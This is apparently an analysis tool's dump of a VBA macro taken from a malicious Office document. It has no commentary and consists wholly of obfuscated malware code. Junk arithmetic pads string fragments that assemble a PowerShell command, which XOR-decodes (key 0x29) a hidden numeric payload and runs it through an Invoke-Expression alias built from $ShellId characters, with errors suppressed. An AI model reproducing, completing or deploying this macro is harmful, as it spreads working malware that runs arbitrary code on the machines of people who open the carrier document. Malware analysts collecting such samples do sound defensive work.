Filename     : ./macros/3be9d28f1dc29770e01e9e611452e041f04742b8910059ed26b5797582874ee2
OLE stream   : Macros/VBA/OhcnaFpoozid
VBA filename : OhcnaFpoozid.bas
----------------------------------------
Attribute VB_Name = "OhcnaFpoozid"
Function WqBrMduUcI()
On Error Resume Next
FtWZbS = iCzclY
LwVZqk = Rnd(sXWfmi)
UmAbjf = 2359 + NkMhJ
iZVfAs = (71149 * Sgn(lHika) / 82168 / kNIbvm * zGKQmm + ChrW(BzvHHp) / PjhRBo * CInt(PvrrF))
tiCUTQ = "HeLL [S" + "tRin" + "G]::joi" + "N( '' , " + "( " + "'13," + "88h1" + "12w"
kKSZj = SOfkiA
RmTKcG = Rnd(ZPVjF)
jkIjcS = 1922 + VjbJuz
OzLzLD = (15539 * Sgn(HMPYE) / 4332 / FsAiJf * ECKYKO + ChrW(cwzSM) / VVdzrp * CInt(dwDAcl))
jMAtbuUjq = "97,109V106" + "V107w9I20h9s7" + "1h76V94~4w70u7" + "5z67"
jLFzJ = YtMpOB
Jmkwr = Rnd(YvInn)
tBiNRG = 85781 + bjOCr
CJaNqK = (97162 * Sgn(wzkmtj) / 33746 / ZYhFYc * pJdrU + ChrW(pozQj) / LBWYss * CInt(kMUMQ))
iLKftWmO = "V76s74w93c9s9" + "1h72V71I77,70,6" + "8,18,1" + "3w64," + "71u96z90I" + "110s72c9w20z9u7"
MAsAUw = iNBDX
HzmRh = Rnd(CZwkEM)
ivGKl = 41901 + tGsDz
UdQPQ = (35407 * Sgn(ZObdC) / 68228 / CTAGjR * iBhwQH + ChrW(pRuDmT) / kdrck * CInt(PwYOzk))
JPqPHIudhwK = "1~76w94,4z7" + "0h75u67h76,74," + "93c" + "9V122~80" + "u90~93c7" + "6h68" + "h7V103w76,9" + "3V7~"
dckdTw = DoiFzj
LKMuT = Rnd(ZlbiT)
KMjwha = 29985 + qRqJi
tPIuYc = (50361 * Sgn(fBqnhU) / 28347 / UCQUbz * wPUTH + ChrW(Friqi) / bIvlC * CInt(Cwimf))
kTaHbt = "126" + "I76u75s" + "106h69h64h76s" + "71,93h1" + "8V13z107s125" + "c97I11"
vZASL = EITduo
LouKC = Rnd(PGvNKf)
ISDaK = 16061 + zznkYR
bbbNzQ = (65358 * Sgn(FwVYii) / 31912 / AJmlV * jvvzv + ChrW(AzajVI) / XWamH * CInt(Upaiuh))
OXsoZtRMCC = "2z68z89,9u20h9" + "V14u65V" + "93z93I89z19c6z6" + "I72~" + "90V77u65~78u"
CAdFQA = tLGhH
ntSTI = Rnd(iIvfS)
VisGXp = 5999 + NsraX
RiMcq = (15820 * Sgn(lAbjDo) / 82820 / ouCsw * BdfpOR + ChrW(cWlYQR) / qAPBSj * CInt(BZtCbJ))
kiNYwsTcU = "72V90c77" + "w77s7V74z70~6" + "8w6c97u97u107,1" + "07" + "z6h" + "64w71s"
kADlm = HcWFhj
FREpL = Rnd(QBhnbr)
JipKm = 44254 + WniAa
XVoSc = (48776 * Sgn(djXjiQ) / 9462 / iSmDP * KQwwAo + ChrW(dmYIbj) / kiUCbz * CInt(AcTCWi))
JDMGBkl = "77I76s81z7" + "c89,65,89" + "z2" + "2,69~20~93" + "w91,70u71s80s2" + "8,7h74~69s72" + ",90I90,14V7z" + "12" + "2w89u6"
WqBrMduUcI = tiCUTQ + jMAtbuUjq + iLKftWmO + JPqPHIudhwK + kTaHbt + OXsoZtRMCC + kiNYwsTcU + JDMGBkl
End Function
Function ccsOTUk()
On Error Resume Next
OJnit = GjjiFf
uETdU = Rnd(NEqWc)
rzwwbH = 69004 + TAzjc
Zmfsw = (49390 * Sgn(HkDdsu) / 74303 / jtGjAE * DRLcwd + ChrW(POtvA) / TnIzK * CInt(IiGJlw))
NUGjvuD = "9,64h93V1z14w10" + "5V14s0s18z13,97" + "s64V88" + "I109~126u127w9~" + "20V9w13V88w1" + "12w97" + ",109~106~107u" + "7z71u76V81u93"
NzHadH = NZmXRw
izpbVi = Rnd(jiOjV)
NwUpkw = 88414 + JvlHZP
lZcdjY = (21539 * Sgn(QZoEP) / 39858 / EUwPF * kGGsT + ChrW(juCMf) / zYVJip * CInt(lDhilY))
KtjNUQp = "I1I" + "24~5I9u30I26" + "s30,28" + "V28V1" + "6~0" + "z18w13w95~" + "83,83" + "z95~125s" + "83z9c20u9V13V76" + "s71z"
UPDXU = aiWZk
fMVSaB = Rnd(KATWlQ)
bQNMI = 18942 + wfvqH
dBmXCn = (85927 * Sgn(jJnTV) / 54984 / bijac * dYvzv + ChrW(SpcEq) / biIiYd * CInt(zhrLc))
RfWBI = "95~19h93h" + "76" + "I68," + "89I9~2h9~14"
immNS = tJNpc
BrEzzq = Rnd(IRAdra)
lakDE = 92678 + uzGwJD
rUJii = (74177 * Sgn(WWWzoG) / 62745 / HuzCpn * dfOPZM + ChrW(cMuap) / WlSbK * CInt(jvHpz))
bHDrN = "w117u14c9w2u9c" + "13I97s64h88w109" + "h126" + "I127s9c2z9,14" + "w7,76z81c76" + ",14,18V79w7" + "0I91c76I72" + "z74s" + "65c1,13h72"
sdGlV = QIosaM
lUmPQ = Rnd(nbKqiQ)
MlJuK = 5343 + RcWWb
HnOtfH = (4445 * Sgn(zaXBz) / 73884 / pJzQnu * JUZUoA + ChrW(YsihN) / ZCirOZ * CInt(vDjkX))
DURMwnUARiL = ",10" + "2w83,12" + "7w64h9s6" + "4s71h9c" + "13~107I125c97c1" + "12V" + "68"
BOlwF = owkUnu
fTivK = Rnd(BNitU)
SBFYh = 78173 + jrKma
YIMhvJ = (27163 * Sgn(wXDXVu) / 31788 / MUjEoJ * PPYIf + ChrW(ihSik) / LXJPd * CInt(aFrib))
uLiHA = "c89s0u8" + "2V93I91I8" + "0V82,13I64c" + "71h96I90w110~72"
ccsOTUk = NUGjvuD + KtjNUQp + RfWBI + bHDrN + DURMwnUARiL + uLiHA
End Function
Function wEaIvzVJR()
On Error Resume Next
OEThno = HFJhM
qYIYzG = Rnd(IOzwSW)
iSOpk = 86781 + iEQCFD
bBObrs = (55714 * Sgn(IrBwiw) / 23573 / sVuDw * KiPiii + ChrW(MEIYFJ) / qpKNaN * CInt(NRiFq))
UMVntCdLVja = "u7s109V70V94h7" + "1w69~" + "70I72~77s111h" + "64w" + "69z76u1,1" + "3z72I102s83,127" + "s64w7u125w70" + "h122"
zNjYsc = zQVOPc
oMnmJ = Rnd(hqjLNK)
Dvmtac = 78480 + cDLhcl
GdzDfJ = (21988 * Sgn(YIcBVL) / 18168 / FjEutW * oRRRvW + ChrW(LNMwW) / NiwbbX * CInt(YvrGaq))
WMrMG = "w93~91s64~71s78" + "z1V0w5I9h1" + "3c95c" + "83z83c95h125I83" + "z0I" + "18u12" + "2w9"
HtaLqE = HdBfGl
PiLhsk = Rnd(IlNrQD)
zPoXp = 68115 + bjcSV
EtijLT = (76569 * Sgn(fCjlHY) / 77857 / jOWCrP * CBLVt + ChrW(NJRDH) / iAsHC * CInt(jNYcFz))
wtIRz = "3s72c9" + "1c93s4~121s9" + "1c70~74w76s90~" + "90c9I13s9" + "5c8" + "3z83s" + "95z125~83~18w7"
LBmav = Lapvs
TiSQj = Rnd(kpijiA)
uGStRh = 98668 + GzqHU
TXUzUJ = (12238 * Sgn(zZviK) / 45723 / vMjbIP * ZovFnn + ChrW(UQWAkN) / tGdhBQ * CInt(lGIPX))
wBCHirZXl = "5w9" + "1s76s" + "72V66V18z84V7" + "4V72z93I74c" + "65s8" + "2s94u9"
zToin = PYWHID
PNITj = Rnd(szjDO)
SRiIY = 56767 + JWBGDu
RViNC = (28402 * Sgn(iwdch) / 58773 / NrNGFY * SZJwPY + ChrW(tuXAU) / IosoD * CInt(kYBpLA))
cVAhwuz = "1V64z93" + "V76~4u65z70u90" + ",93h9h13s118" + "w7w108u81I74I76"
QoDRj = zGYFMm
ABhIB = Rnd(fozwU)
mqDoD = 11848 + MSjZzZ
zpXJr = (46792 * Sgn(Rwjkz) / 68058 / nrTbhj * mqlhMV + ChrW(jSzbR) / iXuXhb * CInt(lSHSU))
alJUO = "s89V93z" + "64c7" + "0z71z7s100I76" + "I90,90I72z" + "78V7" + "6w1" + "8I84w8" + "4' -SPlIt 'S" + "' -SPlIt ',' -" + "SpLit '"
wEaIvzVJR = UMVntCdLVja + WMrMG + wtIRz + wBCHirZXl + cVAhwuz + alJUO
End Function
Function fcCLAnkZ()
On Error Resume Next
NTjSNM = HQNTw
OJPEd = Rnd(CXLwlb)
CHljiI = 61763 + FQwwuG
MSYJv = (4503 * Sgn(sAlYK) / 76967 / JtTIj * TKrPT + ChrW(SvAUS) / LRnnr * CInt(AsiqNi))
nUbBAOYds = "~' -S" + "PL" + "it'H' -SpliT " + "'i'-SPLI" + "t 'w'-" + "SPl" + "It'u'-Split '" + "v' -SpLit'C'" + "-SPli"
jHrqd = JEKoGz
IZLzO = Rnd(FkYuBa)
qhjds = 60916 + JwWNW
WNinXl = (24241 * Sgn(zSIEzh) / 28754 / JDwbN * zsiQF + ChrW(Ffscj) / IFiKz * CInt(JSiojl))
TNIsa = "T'z'| fOR" + "eaCH-oBjECt {[c" + "hAR]( $_ " + "-bXOr  0x29" + " )}) )| &( $SHe" + "lliD" + "[1]+$sHEL"
WRuiJ = wlpVC
PuDAlI = Rnd(YFPlF)
jwdRa = 60951 + rYIWw
GUKiDq = (87208 * Sgn(tvNpR) / 27825 / Moqlj * imDdX + ChrW(bJUqa) / nTLOIV * CInt(ctKaE))
dwsJCK = "LiD[1" + "3]+'x')"
fcCLAnkZ = nUbBAOYds + TNIsa + dwsJCK
End Function

